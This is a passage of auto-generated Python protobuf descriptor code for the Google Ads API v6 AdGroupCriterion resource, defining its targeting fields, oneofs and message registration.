name='url_custom_parameters', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.url_custom_parameters', index=28,
number=14, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='keyword', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.keyword', index=29,
number=27, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='placement', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.placement', index=30,
number=28, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='mobile_app_category', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.mobile_app_category', index=31,
number=29, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='mobile_application', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.mobile_application', index=32,
number=30, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='listing_group', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.listing_group', index=33,
number=32, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='age_range', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.age_range', index=34,
number=36, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='gender', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.gender', index=35,
number=37, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='income_range', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.income_range', index=36,
number=38, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='parental_status', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.parental_status', index=37,
number=39, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='user_list', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.user_list', index=38,
number=42, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='youtube_video', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.youtube_video', index=39,
number=40, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='youtube_channel', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.youtube_channel', index=40,
number=41, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='topic', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.topic', index=41,
number=43, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='user_interest', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.user_interest', index=42,
number=45, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='webpage', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.webpage', index=43,
number=46, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='app_payment_model', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.app_payment_model', index=44,
number=47, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='custom_affinity', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.custom_affinity', index=45,
number=48, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='custom_intent', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.custom_intent', index=46,
number=49, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='custom_audience', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.custom_audience', index=47,
number=74, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='combined_audience', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.combined_audience', index=48,
number=75, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[_ADGROUPCRITERION_QUALITYINFO, _ADGROUPCRITERION_POSITIONESTIMATES, ],
enum_types=[
],
serialized_options=b'\352Aq\n)googleads.googleapis.com/AdGroupCriterion\022Dcustomers/{customer_id}/adGroupCriteria/{ad_group_id}~{criterion_id}',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='criterion', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.criterion',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_criterion_id', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._criterion_id',
index=1, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_ad_group', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._ad_group',
index=2, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_negative', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._negative',
index=3, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_bid_modifier', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._bid_modifier',
index=4, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_cpc_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._cpc_bid_micros',
index=5, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_cpm_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._cpm_bid_micros',
index=6, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_cpv_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._cpv_bid_micros',
index=7, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_percent_cpc_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._percent_cpc_bid_micros',
index=8, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_effective_cpc_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._effective_cpc_bid_micros',
index=9, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_effective_cpm_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._effective_cpm_bid_micros',
index=10, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_effective_cpv_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._effective_cpv_bid_micros',
index=11, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_effective_percent_cpc_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._effective_percent_cpc_bid_micros',
index=12, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_final_url_suffix', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._final_url_suffix',
index=13, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_tracking_url_template', full_name='google.ads.googleads.v6.resources.AdGroupCriterion._tracking_url_template',
index=14, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=656,
serialized_end=5362,
)
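# Post-construction wiring emitted by protoc: resolve each field's enum or
# message type against the imported *_pb2 modules, and register optional and
# oneof fields with their containing oneof descriptors.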
_ADGROUPCRITERION_QUALITYINFO.fields_by_name['creative_quality_score'].enum_type = google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_quality__score__bucket__pb2._QUALITYSCOREBUCKETENUM_QUALITYSCOREBUCKET
_ADGROUPCRITERION_QUALITYINFO.fields_by_name['post_click_quality_score'].enum_type = google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_quality__score__bucket__pb2._QUALITYSCOREBUCKETENUM_QUALITYSCOREBUCKET
_ADGROUPCRITERION_QUALITYINFO.fields_by_name['search_predicted_ctr'].enum_type = google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_quality__score__bucket__pb2._QUALITYSCOREBUCKETENUM_QUALITYSCOREBUCKET
_ADGROUPCRITERION_QUALITYINFO.containing_type = _ADGROUPCRITERION
_ADGROUPCRITERION_QUALITYINFO.oneofs_by_name['_quality_score'].fields.append(
_ADGROUPCRITERION_QUALITYINFO.fields_by_name['quality_score'])
_ADGROUPCRITERION_QUALITYINFO.fields_by_name['quality_score'].containing_oneof = _ADGROUPCRITERION_QUALITYINFO.oneofs_by_name['_quality_score']
_ADGROUPCRITERION_POSITIONESTIMATES.containing_type = _ADGROUPCRITERION
_ADGROUPCRITERION_POSITIONESTIMATES.oneofs_by_name['_first_page_cpc_micros'].fields.append(
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['first_page_cpc_micros'])
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['first_page_cpc_micros'].containing_oneof = _ADGROUPCRITERION_POSITIONESTIMATES.oneofs_by_name['_first_page_cpc_micros']
_ADGROUPCRITERION_POSITIONESTIMATES.oneofs_by_name['_first_position_cpc_micros'].fields.append(
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['first_position_cpc_micros'])
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['first_position_cpc_micros'].containing_oneof = _ADGROUPCRITERION_POSITIONESTIMATES.oneofs_by_name['_first_position_cpc_micros']
_ADGROUPCRITERION_POSITIONESTIMATES.oneofs_by_name['_top_of_page_cpc_micros'].fields.append(
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['top_of_page_cpc_micros'])
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['top_of_page_cpc_micros'].containing_oneof = _ADGROUPCRITERION_POSITIONESTIMATES.oneofs_by_name['_top_of_page_cpc_micros']
_ADGROUPCRITERION_POSITIONESTIMATES.oneofs_by_name['_estimated_add_clicks_at_first_position_cpc'].fields.append(
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['estimated_add_clicks_at_first_position_cpc'])
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['estimated_add_clicks_at_first_position_cpc'].containing_oneof = _ADGROUPCRITERION_POSITIONESTIMATES.oneofs_by_name['_estimated_add_clicks_at_first_position_cpc']
_ADGROUPCRITERION_POSITIONESTIMATES.oneofs_by_name['_estimated_add_cost_at_first_position_cpc'].fields.append(
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['estimated_add_cost_at_first_position_cpc'])
_ADGROUPCRITERION_POSITIONESTIMATES.fields_by_name['estimated_add_cost_at_first_position_cpc'].containing_oneof = _ADGROUPCRITERION_POSITIONESTIMATES.oneofs_by_name['_estimated_add_cost_at_first_position_cpc']
_ADGROUPCRITERION.fields_by_name['status'].enum_type = google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_ad__group__criterion__status__pb2._ADGROUPCRITERIONSTATUSENUM_ADGROUPCRITERIONSTATUS
_ADGROUPCRITERION.fields_by_name['quality_info'].message_type = _ADGROUPCRITERION_QUALITYINFO
_ADGROUPCRITERION.fields_by_name['type'].enum_type = google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_criterion__type__pb2._CRITERIONTYPEENUM_CRITERIONTYPE
_ADGROUPCRITERION.fields_by_name['system_serving_status'].enum_type = google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_criterion__system__serving__status__pb2._CRITERIONSYSTEMSERVINGSTATUSENUM_CRITERIONSYSTEMSERVINGSTATUS
_ADGROUPCRITERION.fields_by_name['approval_status'].enum_type = google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_ad__group__criterion__approval__status__pb2._ADGROUPCRITERIONAPPROVALSTATUSENUM_ADGROUPCRITERIONAPPROVALSTATUS
_ADGROUPCRITERION.fields_by_name['effective_cpc_bid_source'].enum_type = google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_bidding__source__pb2._BIDDINGSOURCEENUM_BIDDINGSOURCE
_ADGROUPCRITERION.fields_by_name['effective_cpm_bid_source'].enum_type = google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_bidding__source__pb2._BIDDINGSOURCEENUM_BIDDINGSOURCE
_ADGROUPCRITERION.fields_by_name['effective_cpv_bid_source'].enum_type = google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_bidding__source__pb2._BIDDINGSOURCEENUM_BIDDINGSOURCE
_ADGROUPCRITERION.fields_by_name['effective_percent_cpc_bid_source'].enum_type = google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_bidding__source__pb2._BIDDINGSOURCEENUM_BIDDINGSOURCE
_ADGROUPCRITERION.fields_by_name['position_estimates'].message_type = _ADGROUPCRITERION_POSITIONESTIMATES
_ADGROUPCRITERION.fields_by_name['url_custom_parameters'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_custom__parameter__pb2._CUSTOMPARAMETER
_ADGROUPCRITERION.fields_by_name['keyword'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._KEYWORDINFO
_ADGROUPCRITERION.fields_by_name['placement'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._PLACEMENTINFO
_ADGROUPCRITERION.fields_by_name['mobile_app_category'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._MOBILEAPPCATEGORYINFO
_ADGROUPCRITERION.fields_by_name['mobile_application'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._MOBILEAPPLICATIONINFO
_ADGROUPCRITERION.fields_by_name['listing_group'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._LISTINGGROUPINFO
_ADGROUPCRITERION.fields_by_name['age_range'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._AGERANGEINFO
_ADGROUPCRITERION.fields_by_name['gender'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._GENDERINFO
_ADGROUPCRITERION.fields_by_name['income_range'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._INCOMERANGEINFO
_ADGROUPCRITERION.fields_by_name['parental_status'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._PARENTALSTATUSINFO
_ADGROUPCRITERION.fields_by_name['user_list'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._USERLISTINFO
_ADGROUPCRITERION.fields_by_name['youtube_video'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._YOUTUBEVIDEOINFO
_ADGROUPCRITERION.fields_by_name['youtube_channel'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._YOUTUBECHANNELINFO
_ADGROUPCRITERION.fields_by_name['topic'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._TOPICINFO
_ADGROUPCRITERION.fields_by_name['user_interest'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._USERINTERESTINFO
_ADGROUPCRITERION.fields_by_name['webpage'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._WEBPAGEINFO
_ADGROUPCRITERION.fields_by_name['app_payment_model'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._APPPAYMENTMODELINFO
_ADGROUPCRITERION.fields_by_name['custom_affinity'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._CUSTOMAFFINITYINFO
_ADGROUPCRITERION.fields_by_name['custom_intent'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._CUSTOMINTENTINFO
_ADGROUPCRITERION.fields_by_name['custom_audience'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._CUSTOMAUDIENCEINFO
_ADGROUPCRITERION.fields_by_name['combined_audience'].message_type = google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2._COMBINEDAUDIENCEINFO
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['keyword'])
_ADGROUPCRITERION.fields_by_name['keyword'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['placement'])
_ADGROUPCRITERION.fields_by_name['placement'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['mobile_app_category'])
_ADGROUPCRITERION.fields_by_name['mobile_app_category'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['mobile_application'])
_ADGROUPCRITERION.fields_by_name['mobile_application'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['listing_group'])
_ADGROUPCRITERION.fields_by_name['listing_group'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['age_range'])
_ADGROUPCRITERION.fields_by_name['age_range'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['gender'])
_ADGROUPCRITERION.fields_by_name['gender'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['income_range'])
_ADGROUPCRITERION.fields_by_name['income_range'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['parental_status'])
_ADGROUPCRITERION.fields_by_name['parental_status'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['user_list'])
_ADGROUPCRITERION.fields_by_name['user_list'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['youtube_video'])
_ADGROUPCRITERION.fields_by_name['youtube_video'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['youtube_channel'])
_ADGROUPCRITERION.fields_by_name['youtube_channel'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['topic'])
_ADGROUPCRITERION.fields_by_name['topic'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['user_interest'])
_ADGROUPCRITERION.fields_by_name['user_interest'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['webpage'])
_ADGROUPCRITERION.fields_by_name['webpage'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['app_payment_model'])
_ADGROUPCRITERION.fields_by_name['app_payment_model'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['custom_affinity'])
_ADGROUPCRITERION.fields_by_name['custom_affinity'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['custom_intent'])
_ADGROUPCRITERION.fields_by_name['custom_intent'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['custom_audience'])
_ADGROUPCRITERION.fields_by_name['custom_audience'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['criterion'].fields.append(
_ADGROUPCRITERION.fields_by_name['combined_audience'])
_ADGROUPCRITERION.fields_by_name['combined_audience'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['criterion']
_ADGROUPCRITERION.oneofs_by_name['_criterion_id'].fields.append(
_ADGROUPCRITERION.fields_by_name['criterion_id'])
_ADGROUPCRITERION.fields_by_name['criterion_id'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_criterion_id']
_ADGROUPCRITERION.oneofs_by_name['_ad_group'].fields.append(
_ADGROUPCRITERION.fields_by_name['ad_group'])
_ADGROUPCRITERION.fields_by_name['ad_group'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_ad_group']
_ADGROUPCRITERION.oneofs_by_name['_negative'].fields.append(
_ADGROUPCRITERION.fields_by_name['negative'])
_ADGROUPCRITERION.fields_by_name['negative'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_negative']
_ADGROUPCRITERION.oneofs_by_name['_bid_modifier'].fields.append(
_ADGROUPCRITERION.fields_by_name['bid_modifier'])
_ADGROUPCRITERION.fields_by_name['bid_modifier'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_bid_modifier']
_ADGROUPCRITERION.oneofs_by_name['_cpc_bid_micros'].fields.append(
_ADGROUPCRITERION.fields_by_name['cpc_bid_micros'])
_ADGROUPCRITERION.fields_by_name['cpc_bid_micros'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_cpc_bid_micros']
_ADGROUPCRITERION.oneofs_by_name['_cpm_bid_micros'].fields.append(
_ADGROUPCRITERION.fields_by_name['cpm_bid_micros'])
_ADGROUPCRITERION.fields_by_name['cpm_bid_micros'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_cpm_bid_micros']
_ADGROUPCRITERION.oneofs_by_name['_cpv_bid_micros'].fields.append(
_ADGROUPCRITERION.fields_by_name['cpv_bid_micros'])
_ADGROUPCRITERION.fields_by_name['cpv_bid_micros'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_cpv_bid_micros']
_ADGROUPCRITERION.oneofs_by_name['_percent_cpc_bid_micros'].fields.append(
_ADGROUPCRITERION.fields_by_name['percent_cpc_bid_micros'])
_ADGROUPCRITERION.fields_by_name['percent_cpc_bid_micros'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_percent_cpc_bid_micros']
_ADGROUPCRITERION.oneofs_by_name['_effective_cpc_bid_micros'].fields.append(
_ADGROUPCRITERION.fields_by_name['effective_cpc_bid_micros'])
_ADGROUPCRITERION.fields_by_name['effective_cpc_bid_micros'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_effective_cpc_bid_micros']
_ADGROUPCRITERION.oneofs_by_name['_effective_cpm_bid_micros'].fields.append(
_ADGROUPCRITERION.fields_by_name['effective_cpm_bid_micros'])
_ADGROUPCRITERION.fields_by_name['effective_cpm_bid_micros'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_effective_cpm_bid_micros']
_ADGROUPCRITERION.oneofs_by_name['_effective_cpv_bid_micros'].fields.append(
_ADGROUPCRITERION.fields_by_name['effective_cpv_bid_micros'])
_ADGROUPCRITERION.fields_by_name['effective_cpv_bid_micros'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_effective_cpv_bid_micros']
_ADGROUPCRITERION.oneofs_by_name['_effective_percent_cpc_bid_micros'].fields.append(
_ADGROUPCRITERION.fields_by_name['effective_percent_cpc_bid_micros'])
_ADGROUPCRITERION.fields_by_name['effective_percent_cpc_bid_micros'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_effective_percent_cpc_bid_micros']
_ADGROUPCRITERION.oneofs_by_name['_final_url_suffix'].fields.append(
_ADGROUPCRITERION.fields_by_name['final_url_suffix'])
_ADGROUPCRITERION.fields_by_name['final_url_suffix'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_final_url_suffix']
_ADGROUPCRITERION.oneofs_by_name['_tracking_url_template'].fields.append(
_ADGROUPCRITERION.fields_by_name['tracking_url_template'])
_ADGROUPCRITERION.fields_by_name['tracking_url_template'].containing_oneof = _ADGROUPCRITERION.oneofs_by_name['_tracking_url_template']
DESCRIPTOR.message_types_by_name['AdGroupCriterion'] = _ADGROUPCRITERION
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
AdGroupCriterion = _reflection.GeneratedProtocolMessageType('AdGroupCriterion', (_message.Message,), {
'QualityInfo' : _reflection.GeneratedProtocolMessageType('QualityInfo', (_message.Message,), {
'DESCRIPTOR' : _ADGROUPCRITERION_QUALITYINFO,
'__module__' : 'google.ads.googleads.v6.resources.ad_group_criterion_pb2'
# @@protoc_insertion_point(class_scope:google.ads.googleads.v6.resources.AdGroupCriterion.QualityInfo)
})
,
'PositionEstimates' : _reflection.GeneratedProtocolMessageType('PositionEstimates', (_message.Message,), {
'DESCRIPTOR' : _ADGROUPCRITERION_POSITIONESTIMATES,
'__module__' : 'google.ads.googleads.v6.resources.ad_group_criterion_pb2'
# @@protoc_insertion_point(class_scope:google.ads.googleads.v6.resources.AdGroupCriterion.PositionEstimates)
})
,
'DESCRIPTOR' : _ADGROUPCRITERION,
'__module__' : 'google.ads.googleads.v6.resources.ad_group_criterion_pb2'
# @@protoc_insertion_point(class_scope:google.ads.googleads.v6.resources.AdGroupCriterion)
})
_sym_db.RegisterMessage(AdGroupCriterion)
_sym_db.RegisterMessage(AdGroupCriterion.QualityInfo)
